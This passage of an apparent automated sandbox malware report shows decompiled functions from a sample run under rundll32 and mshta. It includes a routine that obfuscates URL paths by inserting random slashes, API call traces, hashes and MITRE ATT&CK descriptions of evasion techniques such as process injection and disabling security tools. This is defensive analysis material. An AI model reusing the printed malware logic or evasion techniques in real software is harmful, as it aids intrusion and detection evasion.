					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04441EF5(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x044430f2
0x044430f6
0x044430f7
0x044430f8
0x044430fa
0x044430fc
0x04443101
0x04443104
0x0444319b
0x044431a2
0x044431a2
0x0444310d
0x04443114
0x04443124
0x04443124
0x0444312a
0x0444312c
0x04443131
0x0444313a
0x04443142
0x04443145
0x04443150
0x04443154
0x04443156
0x04443157
0x04443160
0x04443164
0x04443175
0x04443166
0x0444316b
0x04443170
0x0444317f
0x0444317f
0x04443154
0x04443185
0x0444318b
0x0444318b
0x04443194
0x04443199
0x04443199
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 04443114
lstrlenW.KERNEL32(?), ref: 0444314A
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 0444316B
SysFreeString.OLEAUT32(?), ref: 0444317F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: d61e646c538ac137d94dfd9f35d16adc39de2066c932701647fa0ebed6db1965
Instruction ID: 4691238e86c83ee75c8cc07893f760eef9efd59d58ee92f855b21ba3e29eb599
Opcode Fuzzy Hash: d61e646c538ac137d94dfd9f35d16adc39de2066c932701647fa0ebed6db1965
Instruction Fuzzy Hash: 7A212F75A00209FFEB11DFA5C88899EBBB8EF89705B10416AE905A7210E730AA45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 7030619A, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 703061C3
__isleadbyte_l.LIBCMTD ref: 703061E6
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 7030626F

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: Locale$UpdateUpdate::~_$__isleadbyte_l
String ID:
API String ID: 3717226027-0
Opcode ID: 084f9f23d1955672a58a5eee8faea2e48d45cc3289c5d431de560cfe530ed68d
Instruction ID: 5674ab8211b428dcffc6794dc241fe45719e5ac74aa84268d44c373f1e216d49
Opcode Fuzzy Hash: 084f9f23d1955672a58a5eee8faea2e48d45cc3289c5d431de560cfe530ed68d
Instruction Fuzzy Hash: C43128729011099FCB04CF94C8A6BFEBBB9EF58344F44405DE9066B295DB34AA95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04441F79, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04441F79(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x444a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x444a2a8; // 0x81c59f3
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x444a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x04441f81
0x04441f84
0x04441f8a
0x04441fa2
0x04441fa6
0x04441fa9
0x04441fab
0x04441fae
0x04441fb0
0x04441fb3
0x04441fb5
0x04441fb5
0x04441fb7
0x04441fc2
0x04441fc7
0x04441fd8
0x04441fe0
0x04441fe5
0x04441fe8
0x04441feb
0x04441fed
0x04441ff3
0x04441ff6
0x04441ff6
0x04441ff6
0x04442001
0x04442006
0x04442010

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04443A79,00000000,?,00000000,044470F6,00000000,05349630), ref: 04441F84
RtlAllocateHeap.NTDLL(00000000,?), ref: 04441F9C
memcpy.NTDLL(00000000,05349630,-00000008,?,?,?,04443A79,00000000,?,00000000,044470F6,00000000,05349630), ref: 04441FE0
memcpy.NTDLL(00000001,05349630,00000001,044470F6,00000000,05349630), ref: 04442001

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: d0e85ba7d0d534075e03d44c15cb92c1e88b2f4dfbae9f0d8bf8a1b76fdfe4db
Instruction ID: 6590b973c314fe0388a60002c3f663618e686963011b27494d61daad3fef14a7
Opcode Fuzzy Hash: d0e85ba7d0d534075e03d44c15cb92c1e88b2f4dfbae9f0d8bf8a1b76fdfe4db
Instruction Fuzzy Hash: AF110676B00114AFEB108F69DC88D9FBBBEEBC1650B150266F504D7240EA75AE04D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0444760E, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0444760E() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x444a2c4; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x444a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x444a2c4; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x444a290; // 0x4f50000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x0444760e
0x04447615
0x0444765f
0x04447661
0x04447661
0x04447619
0x0444761f
0x04447624
0x04447628
0x0444762e
0x04447635
0x00000000
0x00000000
0x04447637
0x0444763c
0x00000000
0x00000000
0x00000000
0x0444763c
0x0444763e
0x04447646
0x04447649
0x04447649
0x0444764f
0x04447656
0x04447659
0x04447659
0x00000000

APIs

SetEvent.KERNEL32(000002D8,00000001,0444278B), ref: 04447619
SleepEx.KERNEL32(00000064,00000001), ref: 04447628
CloseHandle.KERNEL32(000002D8), ref: 04447649
HeapDestroy.KERNEL32(04F50000), ref: 04447659

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d78eecd1bdbddbbcaa6866d7d878d3e7be826d9ad7dc3183d9e3cf7ace16d1e6
Instruction ID: 0eed1a28be61a17046054b60dcddf9d726db276cf4c7f44c62248d19a8c4ac73
Opcode Fuzzy Hash: d78eecd1bdbddbbcaa6866d7d878d3e7be826d9ad7dc3183d9e3cf7ace16d1e6
Instruction Fuzzy Hash: B4F030B9B403119BFF60AB38A84CB4777ADEB94B31B040115BD04E3388DB29EC01E660

Uniqueness

Uniqueness Score: -1.00%

Function 0444437C, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0444437C(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x444a37c; // 0x5349630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x444a37c; // 0x5349630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x444a030) {
					HeapFree( *0x444a290, 0, _t8);
				}
				_t13[1] = E044413A1(_v0, _t13);
				_t10 =  *0x444a37c; // 0x5349630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x0444437c
0x0444437c
0x04444385
0x04444395
0x04444395
0x0444439a
0x0444439f
0x00000000
0x00000000
0x0444438f
0x0444438f
0x044443a1
0x044443a5
0x044443b7
0x044443b7
0x044443c7
0x044443ca
0x044443cf
0x044443d3
0x044443d9

APIs

RtlEnterCriticalSection.NTDLL(053495F0), ref: 04444385
Sleep.KERNEL32(0000000A,?,?,044464BE,?,?,?,?,?,04442582,?,00000001), ref: 0444438F
HeapFree.KERNEL32(00000000,00000000,?,?,044464BE,?,?,?,?,?,04442582,?,00000001), ref: 044443B7
RtlLeaveCriticalSection.NTDLL(053495F0), ref: 044443D3

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 2e5a28ae94be1596ea29d43cfa121aa9287339473734225b9ff261bf2f8e06e3
Instruction ID: 7bb9635b2bab7c36b2fe8299da5cf944b9db040a697ca0f446cee919adcd1e0b
Opcode Fuzzy Hash: 2e5a28ae94be1596ea29d43cfa121aa9287339473734225b9ff261bf2f8e06e3
Instruction Fuzzy Hash: DEF0FEB93402409BFB209F75E849F177BA8EBC4B45B048406F555E6651DB38FC50DB15

Uniqueness

Uniqueness Score: -1.00%

Function 044446AC, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E044446AC() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x444a37c; // 0x5349630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x444a37c; // 0x5349630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x444a37c; // 0x5349630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x444b85e) {
					HeapFree( *0x444a290, 0, _t10);
					_t7 =  *0x444a37c; // 0x5349630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x044446ac
0x044446b5
0x044446c5
0x044446c5
0x044446ca
0x044446cf
0x00000000
0x00000000
0x044446bf
0x044446bf
0x044446d1
0x044446d6
0x044446da
0x044446ed
0x044446f3
0x044446f3
0x044446fc
0x044446fe
0x04444702
0x04444708

APIs

RtlEnterCriticalSection.NTDLL(053495F0), ref: 044446B5
Sleep.KERNEL32(0000000A,?,?,044464BE,?,?,?,?,?,04442582,?,00000001), ref: 044446BF
HeapFree.KERNEL32(00000000,?,?,?,044464BE,?,?,?,?,?,04442582,?,00000001), ref: 044446ED
RtlLeaveCriticalSection.NTDLL(053495F0), ref: 04444702

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: f8c03da8ffe6aba488e922c678494c2de7365de960737a9a578a28a1eae533f6
Instruction ID: 86bb89f87b654df1816cbce7ac371deb65886ec448c337c3e34bc52c7f2c62a7
Opcode Fuzzy Hash: f8c03da8ffe6aba488e922c678494c2de7365de960737a9a578a28a1eae533f6
Instruction Fuzzy Hash: AAF0D4BC340201DBFB18CF24E849B1677A5EBC8B05B05810AE916A7350DB3CEC00EE24

Uniqueness

Uniqueness Score: -1.00%

Function 04441C32, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04441C32(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04441EF5(_t2);
				if(_t34 != 0) {
					_t30 = E04441EF5(_t28);
					if(_t30 == 0) {
						E044430D1(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0444783A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0444783A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x04441c32
0x04441c3c
0x04441c3e
0x04441c44
0x04441c44
0x04441c4d
0x04441c51
0x04441c5d
0x04441c61
0x04441cd5
0x04441c63
0x04441c63
0x04441c67
0x04441c6e
0x04441c71
0x04441c8b
0x04441c7a
0x04441c7a
0x04441c7e
0x04441c81
0x04441c86
0x04441c86
0x04441c90
0x04441cb8
0x04441cbe
0x04441cc1
0x04441c92
0x04441c94
0x04441c9c
0x04441ca7
0x04441cac
0x04441cac
0x04441cc8
0x04441ccf
0x04441cd0
0x04441cd0
0x04441c61
0x04441ce0

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04446561,00000000,00000000,00000000,05349698,?,?,04441BC3,?,05349698), ref: 04441C3E

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

Part of subcall function 0444783A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04441C6C,00000000,00000001,00000001,?,?,04446561,00000000,00000000,00000000,05349698), ref: 04447848
Part of subcall function 0444783A: StrChrA.SHLWAPI(?,0000003F,?,?,04446561,00000000,00000000,00000000,05349698,?,?,04441BC3,?,05349698,0000EA60,?), ref: 04447852

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04446561,00000000,00000000,00000000,05349698,?,?,04441BC3), ref: 04441C9C
lstrcpy.KERNEL32(00000000,00000000), ref: 04441CAC
lstrcpy.KERNEL32(00000000,00000000), ref: 04441CB8

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: dd533ba7b8080d1fdffe89554e8af358589b81c23a28f1913eccbe50e1226ef9
Instruction ID: 9be48973b0577b74f545ae7731503586f97d57d47758dfff3a166e5e84d26eba
Opcode Fuzzy Hash: dd533ba7b8080d1fdffe89554e8af358589b81c23a28f1913eccbe50e1226ef9
Instruction Fuzzy Hash: A621D571600255ABFF225F79CC88A9B7FB8DF86254F044056FC059B201EB35E981D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04443857, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04443857(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04441EF5(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x0444386c
0x04443870
0x0444387a
0x04443881
0x04443884
0x04443886
0x0444388e
0x04443893
0x044438a1
0x044438a6
0x044438b0

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0534930C,?,044453A4,004F0053,0534930C,?,?,?,?,?,?,044476F0), ref: 04443867
lstrlenW.KERNEL32(044453A4,?,044453A4,004F0053,0534930C,?,?,?,?,?,?,044476F0), ref: 0444386E

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,044453A4,004F0053,0534930C,?,?,?,?,?,?,044476F0), ref: 0444388E
memcpy.NTDLL(74B069A0,044453A4,00000002,00000000,004F0053,74B069A0,?,?,044453A4,004F0053,0534930C), ref: 044438A1

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 7e073bf3402db6cb3bebfd6eb2831e3d9e848fe5bab4e56de26a1026bd490778
Instruction ID: 348828109f622288354c76ec5a9de54b55bc8ff6607b8107dd1cae4df33234ce
Opcode Fuzzy Hash: 7e073bf3402db6cb3bebfd6eb2831e3d9e848fe5bab4e56de26a1026bd490778
Instruction Fuzzy Hash: C7F03C76900118BBEF11EFE9CC45CDF7BACEF482547114066AD08D7201E631EE159BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04445217, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0534887A,00000000,00000000,00000000,0444711D,00000000), ref: 04445227
lstrlen.KERNEL32(?), ref: 0444522F

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

lstrcpy.KERNEL32(00000000,0534887A), ref: 04445243
lstrcat.KERNEL32(00000000,?), ref: 0444524E

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: ae14a57a902ddf250e1f8e88e3c02e1ba823477c103495a178a479a9fc84330a
Instruction ID: f78d491e270d82b0f32875a3f587c1b9cc1b79373d6c123f4809c07d59bbb79b
Opcode Fuzzy Hash: ae14a57a902ddf250e1f8e88e3c02e1ba823477c103495a178a479a9fc84330a
Instruction Fuzzy Hash: C2E01277501665A7AB119FE99C48C9FFBACFFDA655304041BFA00D3100CB289D05DBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 5200 Parent PID: 3388 mshta.exeCOMMON

Executed Functions

Function 000002588C020FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.707184799.000002588C020000.00000010.00000001.sdmp, Offset: 000002588C020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_2588c020000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5288b5ae812deed10ff4e8ba31a19101b584868cbe850579e693fa7478c7d215
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 709002244D691A55D46511911D4D25C5040A388195FE444804516A4948DA9D02961556

Uniqueness

Uniqueness Score: -1.00%

Function 000002588C020FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.707184799.000002588C020000.00000010.00000001.sdmp, Offset: 000002588C020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_2588c020000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5288b5ae812deed10ff4e8ba31a19101b584868cbe850579e693fa7478c7d215
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 709002244D691A55D46511911D4D25C5040A388195FE444804516A4948DA9D02961556

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

